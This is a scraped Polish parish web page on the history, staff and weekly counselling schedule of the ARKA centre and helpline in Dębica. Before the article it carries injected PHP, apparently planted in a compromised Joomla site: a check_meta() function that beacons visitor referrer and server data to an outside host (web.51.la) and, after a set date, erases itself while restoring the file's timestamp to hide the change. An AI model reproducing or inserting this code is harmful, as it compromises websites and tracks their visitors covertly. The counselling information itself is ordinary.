check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732005){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Dębicka ARKA
Dębicka ARKA Drukuj Email
Wpisany przez ks. Rafał Słomba   
wtorek, 13 grudnia 2011 01:00


Powstanie w Dębicy Oddziału Poradni Specjalistycznej ARKA wiąże się z rokiem 1997. Dwaj duszpasterze Ks. Bogusław Czech wikariusz Parafii św. Jadwigi w Dębicy i Ks. Antoni Mulka wikariusz Parafii Krzyża Świętego w Dębicy mając ukończone studium na KUL-u w zakresie psychoterapii i poradnictwa rozpoczęli starania o utworzenie Oddziału Poradni Specjalistycznej ARKA w Dębicy. Zaproszono do współpracy psychologów, pedagogów, lekarzy, prawników i duszpasterzy.
Początkowo działalność poradni rozpoczęta 1 grudnia 1997 roku opierała się o nieformalne działanie pomocowe wolontariuszy w oparciu o doświadczenia tarnowskiej ARKI i prawne umocowanie Parafii Św. Jadwigi. Dużą pomocą służyli doradcy z Poradni Rodzinnej działającej przy parafii.
W roku 1998 rozpoczęto formalne starania o uzyskanie osobowości prawnej w ramach Poradni Specjalistycznej ARKA w Tarnowie. Zebranie założycielskie z udziałem 16 osób odbyło się w Dębicy w dniu 15 kwietnia 1998 roku. Wybrany komitet założycielski w osobach - Ks. Bogusław Czech, Ks. Antoni Mulka, Jolanta Pędras zwrócił się do Zarządu Głównego z prośbą o utworzenie Oddziału Terenowego ARKA – Poradni Specjalistycznej i Telefon Zaufania z siedzibą w Dębicy ul. Św. Jadwigi 9. Zarząd Główny w Tarnowie podjął w dniu 27 kwietnia 1998 roku uchwałę powołującą do istnienia Terenowy Oddział ARKI w Dębicy. Pierwszym prezesem mianowanym – zgodnie ze statutem – przez biskupa był ks. Bogusław Czech a liczba zaangażowanych w niesienie pomocy już w maju 1998 roku wynosiła 24 osoby (8 pedagogów, 4 psychologów, 3 prawników, 2 lekarzy, 3 doradców ds. uzależnień alkoholowych) i 4 kapłanów.
Dębicka ARKA była pierwszym oddziałem Poradni Specjalistycznej i Telefonu Zaufania w Diecezji Tarnowskiej. Nieco później powstały oddziały w Mielcu, Bochni i Nowym Sączu. W 1999 roku nastąpiła zmiana i prezesem został Ks. Wiesław Pieja pełniąc tę funkcję do 2007 roku. Kolejnym prezesem był Ks. Sławomir Korus a od 2010 roku nominację przyjął Ks. Rafał Słomba.
Obecnie w dębickiej Arce porad udzielają 22 osoby: 6 psychologów, 2 prawników, 7 pedagogów, 5 doradców ds. uzależnień, lekarz i 2 duszpasterzy.  
Poradnia Specjalistyczna „ARKA” w Dębicy świadczy pomoc w zakresie różnorodnych trudności ludzi, które są nieodłączne od codziennego życia. Dokonuje się to na płaszczyźnie : psychologicznej, pedagogicznej, medycznej, prawnej i duszpasterskiej. Wieloraka pomoc uwzględnia personalistyczną koncepcję człowieka, jego godność, wartość, odpowiedzialność w oparciu o etyczno-społeczne nauczanie Kościoła.
Osoby pracujące w Poradni „ARKA” w Dębicy bezinteresownie świadczą pomoc na rzecz innych. W trakcie zaplanowanych dyżurów pracownicy służą pomocą, wszystkim tym, którzy jej potrzebują. Konsultacje mają najczęściej charakter rozmowy oraz porad, których tematykę proponuje osoba zainteresowana. Nie prowadzi się ścisłej ewidencji imiennej, co pozwala na zachowanie anonimowości rozmówcy. Doradcy również nie podają swoich nazwisk. Taka forma pozwala także na skuteczne likwidowanie barier, które zwykle występują w początkowym etapie procesu pomagania.
Specjaliści nie otrzymując żadnej materialnej gratyfikacji, są wynagradzani w inny sposób, mianowicie odczuwają radość i satysfakcję, że są bezinteresownie potrzebni innym. I nawet w sytuacjach, gdy nie potrafią całkowicie pomóc to zawsze ofiarują swój wolny czas, życzliwość i obecność. Celem tej pracy jest przyczynianie się do „powiększania” dobra i do „pomniejszania” obszarów bólu i cierpienia.

Adres placówki:   
 ul. Świętej Jadwigi 9
Telefon: 014 681 81 41

Godziny otwarcia: od poniedziałku do piątku od 17.00-19.00.

 


 

      Rozkład dyżurów – Dom św. Jadwigi
             

 PSYCHOLOG Poniedziałek 1,2,3,4,5
 LEKARZ Poniedziałek 3
 DUSZPASTERZ Wtorek 1,2,3,4,5
 PEDAGOG Środa 2,3
 DORADCA ds. MŁODZIEŻY Środa 4
 PRAWNIK Czwartek 1,3,4
 DORADCA ds. UZALEŻNIEŃ
Piątek 1,2,3,4,5


Dyżury oraz telefon zaufania w godzinach od 17.00-19.00

 


 

 
 

POLECAMY
Diecezja Tarnowska Konferencja Episkopatu Polski Gość Niedzielny